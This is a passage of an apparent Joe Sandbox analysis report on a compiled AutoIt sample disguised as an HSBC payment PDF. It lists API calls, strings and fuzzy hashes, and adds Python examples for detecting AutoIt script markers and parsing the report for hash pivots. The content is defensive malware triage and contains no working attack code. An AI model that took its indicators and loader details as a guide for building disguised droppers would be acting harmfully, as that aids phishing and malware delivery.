• String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
• API String ID: 537147316-1018226102
• Opcode ID: 0c4d52e0273e1169512128656472f71c6a5450d291fb830b4ecc7d3d703b207e
• Instruction ID: 136c1bde332718f4234bbb9892b60201bfb37e26dd96c6a9a3310cb901d73b7e
• Opcode Fuzzy Hash: 0c4d52e0273e1169512128656472f71c6a5450d291fb830b4ecc7d3d703b207e
• Instruction Fuzzy Hash: 2C027D701083419FC714EF25C8419AFBBE5EF98318F54492FF486A72A2DB38D949CB5A
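The strings in this entry (">>>AUTOIT SCRIPT<<<", "AU3!", "EA06", the #include and directive error messages) are the AutoIt3 script loader's own literals, which is what backs the report's "Binary is likely a compiled AutoIt script file" verdict: this function is the interpreter locating and parsing the embedded script. A practitioner triaging a sample wants the same check offline, before sandboxing. The following is an added example, not Joe Sandbox code and not taken from the sample: it scans a file for the compiled-script markers and reports which PE section each hit lands in. The 12-byte header magic constant is taken from published AutoIt unpackers and YARA rules and is an assumption to verify against your own samples; the "AU3!EA06" and legacy tags are the strings listed above. The PE blob used as input is constructed in the code and is not an executable.

```python
import struct
from typing import List, Tuple

# 12-byte header that precedes a compiled AutoIt3 script blob. Value taken from
# published AutoIt unpackers and YARA rules (assumption: verify on your own samples).
AU3_MAGIC = bytes.fromhex("A3484BBE986C4AA9994C530C")

# Marker name -> byte pattern. "AU3!EA06"/"AU3!EA05" are script subtype tags;
# ">>>AUTOIT SCRIPT<<<" is the legacy tag that older builds used.
MARKERS = {
    "au3-header-magic": AU3_MAGIC,
    "au3-subtype-EA06": b"AU3!EA06",
    "au3-subtype-EA05": b"AU3!EA05",
    "legacy-script-tag": b">>>AUTOIT SCRIPT<<<",
}

Section = Tuple[str, int, int]  # (name, raw file offset, raw size)


def pe_sections(data: bytes) -> List[Section]:
    """Read the section table of a PE file; [] if data is not a parseable PE."""
    try:
        if data[:2] != b"MZ":
            return []
        (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
        if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
            return []
        (num_sections,) = struct.unpack_from("<H", data, e_lfanew + 6)   # COFF NumberOfSections
        (opt_size,) = struct.unpack_from("<H", data, e_lfanew + 20)      # COFF SizeOfOptionalHeader
        table = e_lfanew + 24 + opt_size                                 # first IMAGE_SECTION_HEADER
        sections = []
        for i in range(num_sections):
            off = table + 40 * i
            name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
            raw_size, raw_ptr = struct.unpack_from("<II", data, off + 16)  # SizeOfRawData, PointerToRawData
            sections.append((name, raw_ptr, raw_size))
        return sections
    except struct.error:  # truncated header
        return []


def scan_markers(data: bytes) -> List[Tuple[int, str]]:
    """All (offset, marker) hits, sorted by offset."""
    hits = []
    for name, pattern in MARKERS.items():
        start = 0
        while True:
            i = data.find(pattern, start)
            if i < 0:
                break
            hits.append((i, name))
            start = i + 1
    return sorted(hits)


def section_for(offset: int, sections: List[Section]) -> str:
    for name, raw_ptr, raw_size in sections:
        if raw_ptr <= offset < raw_ptr + raw_size:
            return name
    return "<headers/overlay>"


def report(data: bytes) -> List[Tuple[int, str, str]]:
    """(offset, marker, section) for every marker hit in the file."""
    sections = pe_sections(data)
    return [(off, m, section_for(off, sections)) for off, m in scan_markers(data)]


def is_compiled_autoit(data: bytes) -> bool:
    """True when the script header magic or a subtype tag is present."""
    names = {m for _, m in scan_markers(data)}
    return "au3-header-magic" in names or any(n.startswith("au3-subtype") for n in names)


def build_sample_pe(payload: bytes) -> bytes:
    """Constructed minimal PE-shaped blob (DOS stub, COFF header, .text, .rsrc). Test data only."""
    text = b"\x90" * 64
    rsrc = b"\0" * 16 + payload + b"\0" * 16
    e_lfanew, opt_size = 0x40, 0
    text_off = e_lfanew + 24 + opt_size + 40 * 2
    rsrc_off = text_off + len(text)
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, opt_size, 0x102)

    def sec(name: bytes, vaddr: int, raw_off: int, raw: bytes) -> bytes:
        return struct.pack("<8sIIIIIIHHI", name, len(raw), vaddr, len(raw), raw_off, 0, 0, 0, 0, 0x40000040)

    table = sec(b".text", 0x1000, text_off, text) + sec(b".rsrc", 0x2000, rsrc_off, rsrc)
    return dos + coff + table + text + rsrc


if __name__ == "__main__":
    sample = build_sample_pe(AU3_MAGIC + b"AU3!EA06" + b"constructed script body")
    for off, marker, section in report(sample):
        print(f"{off:#010x}  {section:<10} {marker}")
    print("compiled AutoIt:", is_compiled_autoit(sample))
```

Two caveats when running this on a real file. First, the interpreter stub itself stores "AU3!" and "EA06" as separate literals (that is how they are listed in this entry), so the contiguous "AU3!EA06" tag is only found in the embedded script resource, normally inside .rsrc; a hit in the overlay means the script was appended rather than stored as a resource. Second, a legitimate compiled AutoIt tool trips the same markers, so the result is a packaging fact, not a verdict; the script has to be extracted and read to know what it does.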
APIs
• _memset.LIBCMT ref: 00462D50
• GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00462DDD
• GetMenuItemCount.USER32(004C5890), ref: 00462E66
• DeleteMenu.USER32(004C5890,00000005,00000000,000000F5,?,?), ref: 00462EF6
• DeleteMenu.USER32(004C5890,00000004,00000000), ref: 00462EFE
• DeleteMenu.USER32(004C5890,00000006,00000000), ref: 00462F06
• DeleteMenu.USER32(004C5890,00000003,00000000), ref: 00462F0E
• GetMenuItemCount.USER32(004C5890), ref: 00462F16
• SetMenuItemInfoW.USER32(004C5890,00000004,00000000,00000030), ref: 00462F4C
• GetCursorPos.USER32(?), ref: 00462F56
• SetForegroundWindow.USER32(00000000), ref: 00462F5F
• TrackPopupMenuEx.USER32(004C5890,00000000,?,00000000,00000000,00000000), ref: 00462F72
• PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00462F7E
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
• String ID:
• API String ID: 3993528054-0
• Opcode ID: 68d6ff921564c39c8709aecc737d134abe6a2587159ab4d14f70d8f79111516a
• Instruction ID: dec7b0e441c84a99d0ab23afc077d39fee676e6f9a2472c44709d087c22ecc3a
• Opcode Fuzzy Hash: 68d6ff921564c39c8709aecc737d134abe6a2587159ab4d14f70d8f79111516a
• Instruction Fuzzy Hash: AB71F670601A05BBEB219F54DD49FAABF64FF04314F10022BF615AA2E1D7FA5C10DB5A
APIs
• VariantInit.OLEAUT32(?), ref: 004788D7
• CoInitialize.OLE32(00000000), ref: 00478904
• CoUninitialize.OLE32 ref: 0047890E
• GetRunningObjectTable.OLE32(00000000,?), ref: 00478A0E
• SetErrorMode.KERNEL32(00000001,00000029), ref: 00478B3B
• CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00492C0C), ref: 00478B6F
• CoGetObject.OLE32(?,00000000,00492C0C,?), ref: 00478B92
• SetErrorMode.KERNEL32(00000000), ref: 00478BA5
• SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00478C25
• VariantClear.OLEAUT32(?), ref: 00478C35
Strings
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                                                    • String ID: ,,I
                                                                                                                                                    • API String ID: 2395222682-4163367948
                                                                                                                                                    • Opcode ID: 86113d1df25df9381713289ea4cd204886f45ef52b39823f92184825a9a21490
                                                                                                                                                    • Instruction ID: aabbb54c80bb5556d5779205c7c98f5c8569651e4766cb9ae3be61758569f7e0
                                                                                                                                                    • Opcode Fuzzy Hash: 86113d1df25df9381713289ea4cd204886f45ef52b39823f92184825a9a21490
                                                                                                                                                    • Instruction Fuzzy Hash: 33C138B1604305AFC700DF25C88896BB7E9FF89348F00896EF9899B251DB75ED05CB56
                                                                                                                                                    APIs
                                                                                                                                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: BuffCharUpper
                                                                                                                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                    • API String ID: 3964851224-909552448
                                                                                                                                                    • Opcode ID: 8d3f5457614a560b38f905c17fe191cbfe4d6e9b901594d3939f7eaaff082135
                                                                                                                                                    • Instruction ID: 987af29362f030b9785e67816bde092fa47ad23058dcaf1b7a905610e89cab94
                                                                                                                                                    • Opcode Fuzzy Hash: 8d3f5457614a560b38f905c17fe191cbfe4d6e9b901594d3939f7eaaff082135
                                                                                                                                                    • Instruction Fuzzy Hash: 3C4183312142598BCF60FF11D891AEF3760AF21308F94882BFE5517292D77C9D1ACB69
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                                                                                      • Part of subcall function 00407924: _memmove.LIBCMT ref: 004079AD
                                                                                                                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00465330
                                                                                                                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00465346
                                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00465357
                                                                                                                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00465369
                                                                                                                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0046537A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: SendString$_memmove
                                                                                                                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                    • API String ID: 2279737902-1007645807
                                                                                                                                                    • Opcode ID: a38f690a41644a1ea6aaaa90d6ed946eea0a1c3052881e4aa48fec53c4da1104
                                                                                                                                                    • Instruction ID: 2e8e5f898991f968bbba2f693440f846553d5b5edaf37d24830f39f112612e90
                                                                                                                                                    • Opcode Fuzzy Hash: a38f690a41644a1ea6aaaa90d6ed946eea0a1c3052881e4aa48fec53c4da1104
                                                                                                                                                    • Instruction Fuzzy Hash: CE119370D5015979D720B662CC49EFF7B7CEB91B48F10042F7801A21D1EDB81D45C6BA
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                    • String ID: 0.0.0.0
                                                                                                                                                    • API String ID: 208665112-3771769585
                                                                                                                                                    • Opcode ID: 09d15450440633b0f7a2b62d0b119be12e95eec53dc4214b1ac8cb0b212af872
                                                                                                                                                    • Instruction ID: ae08325a14d93a890b1fa528d308863361f072a57d3f479d6846efdaae1a579c
                                                                                                                                                    • Opcode Fuzzy Hash: 09d15450440633b0f7a2b62d0b119be12e95eec53dc4214b1ac8cb0b212af872
                                                                                                                                                    • Instruction Fuzzy Hash: BD11F331600114AFDB10AB70AC46EDE77ACEB41716F5405BFF44592191FF7889858B5A
                                                                                                                                                    APIs
                                                                                                                                                    • timeGetTime.WINMM ref: 00464F7A
                                                                                                                                                      • Part of subcall function 0042049F: timeGetTime.WINMM(?,75A4B400,00410E7B), ref: 004204A3
                                                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 00464FA6
                                                                                                                                                    • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00464FCA
                                                                                                                                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00464FEC
                                                                                                                                                    • SetActiveWindow.USER32 ref: 0046500B
                                                                                                                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00465019
                                                                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00465038
                                                                                                                                                    • Sleep.KERNEL32(000000FA), ref: 00465043
                                                                                                                                                    • IsWindow.USER32 ref: 0046504F
                                                                                                                                                    • EndDialog.USER32(00000000), ref: 00465060
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                    • String ID: BUTTON
                                                                                                                                                    • API String ID: 1194449130-3405671355
                                                                                                                                                    • Opcode ID: 8774e4f041890dbc2a91042b0544c15fbc059514b46ccdf9cc1dd7305ce15ae1
                                                                                                                                                    • Instruction ID: 17ca608856519cd1955488b4f204772d3e00e2da9bda675b1abbe090807247ff
                                                                                                                                                    • Opcode Fuzzy Hash: 8774e4f041890dbc2a91042b0544c15fbc059514b46ccdf9cc1dd7305ce15ae1
                                                                                                                                                    • Instruction Fuzzy Hash: A521A174200605BFEB505F60FC88F2A3BA9EB44749F25543EF102922B1EB758D549B6F
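Every function block in this part of the report follows one fixed layout (APIs, Strings, Memory Dump Source, Joe Sandbox IDA Plugin, Similarity), and the hashes under Similarity are what an analyst pivots on across reports. The parser below is an added example, not part of the Joe Sandbox report or its tooling: it turns blocks in that layout into records so that API names, the `$`-joined string IDs and the fuzzy hashes can be queried. The sample text is constructed from two blocks on this page (with the snapshot file name shortened); the record fields and helper functions are the example's own choices.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: two function blocks copied from this report in the
# layout Joe Sandbox uses. Values are the report's; only the layout is parsed.
SAMPLE = """\
APIs
  • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
• mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00465330
• mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00465346
Strings
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_sample.jbxd
Similarity
• API ID: SendString$_memmove
• String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
• API String ID: 2279737902-1007645807
• Instruction Fuzzy Hash: CE119370D5015979D720B662CC49EFF7B7CEB91B48F10042F7801A21D1EDB81D45C6BA
APIs
• CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
Strings
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_sample.jbxd
Similarity
• API ID: BuffCharUpper
• String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
• API String ID: 3964851224-909552448
• Instruction Fuzzy Hash: 3C4183312142598BCF60FF11D891AEF3760AF21308F94882BFE5517292D77C9D1ACB69
"""

# The three shapes an APIs bullet takes in the report:
#   Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
#   mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00465330
#   timeGetTime.WINMM ref: 00464F7A
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$"
)
SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Similarity"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: int                      # call-site address, parsed from hex
    caller: Optional[str] = None  # set when the call sits inside a subcall


@dataclass
class FunctionBlock:
    apis: list = field(default_factory=list)
    dump: dict = field(default_factory=dict)        # key -> list of values
    similarity: dict = field(default_factory=dict)  # key -> value

    @property
    def string_ids(self):
        # Joe Sandbox joins the strings with "$"; a string that itself
        # contains "$" would be split too (none occur on this page).
        return [s for s in self.similarity.get("String ID", "").split("$") if s]


def parse_blocks(text):
    """Split report text into FunctionBlock records; a block starts at 'APIs'."""
    blocks, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTION_HEADERS:
            if line == "APIs":
                current = FunctionBlock()
                blocks.append(current)
            section = line
            continue
        if current is None or not line.startswith("•"):
            continue
        body = line[1:].strip()
        if section == "APIs":
            m = API_RE.match(body)
            if m is None:
                raise ValueError(f"unrecognised API line: {body!r}")
            args = m["args"].split(",") if m["args"] is not None else []
            current.apis.append(ApiCall(m["name"], m["module"], args,
                                        int(m["ref"], 16), m["caller"]))
        elif section in ("Memory Dump Source", "Similarity"):
            key, _, value = body.partition(":")   # first colon only
            if section == "Similarity":
                current.similarity[key.strip()] = value.strip()
            else:
                current.dump.setdefault(key.strip(), []).append(value.strip())
    return blocks


def find_callers(blocks, api_name):
    """Indices of blocks that call api_name directly (not via a subcall)."""
    return [i for i, b in enumerate(blocks)
            if any(c.name == api_name and c.caller is None for c in b.apis)]


def pivot_index(blocks, key="Instruction Fuzzy Hash"):
    """Map a Similarity field to the API IDs of the blocks carrying it."""
    out = {}
    for b in blocks:
        h = b.similarity.get(key)
        if h:
            out.setdefault(h, []).append(b.similarity.get("API ID", ""))
    return out
```

Running `parse_blocks` over a whole report and feeding `pivot_index` from several reports into one dictionary gives a quick answer to "which other samples contain a function with this instruction fuzzy hash", which is the practical use of the Similarity section.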
                                                                                                                                                    APIs
                                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 0045C283
                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0045C295
                                                                                                                                                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0045C2F3
                                                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 0045C2FE
                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0045C310
                                                                                                                                                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0045C364
                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0045C372
                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0045C383
                                                                                                                                                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0045C3C6
                                                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 0045C3D4
                                                                                                                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0045C3F1
                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0045C3FE
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: Window$ItemMoveRect$Invalidate
• String ID:
• API String ID: 3096461208-0
• Opcode ID: ee900cb0418c209eff2971d5848f65fb009066793c70c2948a602d6ec38bc7ab
• Instruction ID: 11649da17df5d0755d73b9da25d5b781727aa351e01af551b5c423be9c7c6dfa
• Opcode Fuzzy Hash: ee900cb0418c209eff2971d5848f65fb009066793c70c2948a602d6ec38bc7ab
• Instruction Fuzzy Hash: 62517071B00305AFDB08CFA9DD89AAEBBB6EB88311F14853DF915E7291D7709D448B14
APIs
  • Part of subcall function 00401B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00402036,?,00000000,?,?,?,?,004016CB,00000000,?), ref: 00401B9A
• DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 004020D3
• KillTimer.USER32(-00000001,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0040216E
• DestroyAcceleratorTable.USER32(00000000), ref: 0043BCA6
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BCD7
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BCEE
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BD0A
• DeleteObject.GDI32(00000000), ref: 0043BD1C
Similarity
• API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
• String ID:
• API String ID: 641708696-0
• Opcode ID: 1fe7eb120fb530a9d0c3e86e2d255934ae6300064fd6ce35022d9647bea66392
• Instruction ID: edfb5b42e1aee2da2af7767ce8276f4fdeab99f29820ea46fc720bac3244b47a
• Opcode Fuzzy Hash: 1fe7eb120fb530a9d0c3e86e2d255934ae6300064fd6ce35022d9647bea66392
• Instruction Fuzzy Hash: B0617E34101B10DFD735AF14CA48B2A77F1FB44316F50943EE642AAAE0C7B8A891DB99
APIs
  • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
• GetSysColor.USER32(0000000F), ref: 004021D3
Similarity
• API ID: ColorLongWindow
• String ID:
• API String ID: 259745315-0
• Opcode ID: c544c20de1596d8a35e8bd9b7102db0368e0aafd3e371b07eaad61ce13d863f6
• Instruction ID: b625a7fc61febfd2c935065ad26fa2a4911c749eaed189314b0e0014d1ee1d2c
• Opcode Fuzzy Hash: c544c20de1596d8a35e8bd9b7102db0368e0aafd3e371b07eaad61ce13d863f6
• Instruction Fuzzy Hash: 0B41E531000100EFDB215F68DC8CBBA3B65EB46331F1442BAFE619A2E1C7758C86DB69
APIs
• CharLowerBuffW.USER32(?,?,0048F910), ref: 0046A90B
• GetDriveTypeW.KERNEL32(00000061,004B89A0,00000061), ref: 0046A9D5
• _wcscpy.LIBCMT ref: 0046A9FF
Strings
Similarity
• API ID: BuffCharDriveLowerType_wcscpy
• String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
• API String ID: 2820617543-1000479233
• Opcode ID: 75c02351080d399f54f50797f1575012d7efe7bac2141c4c0566531984a89c98
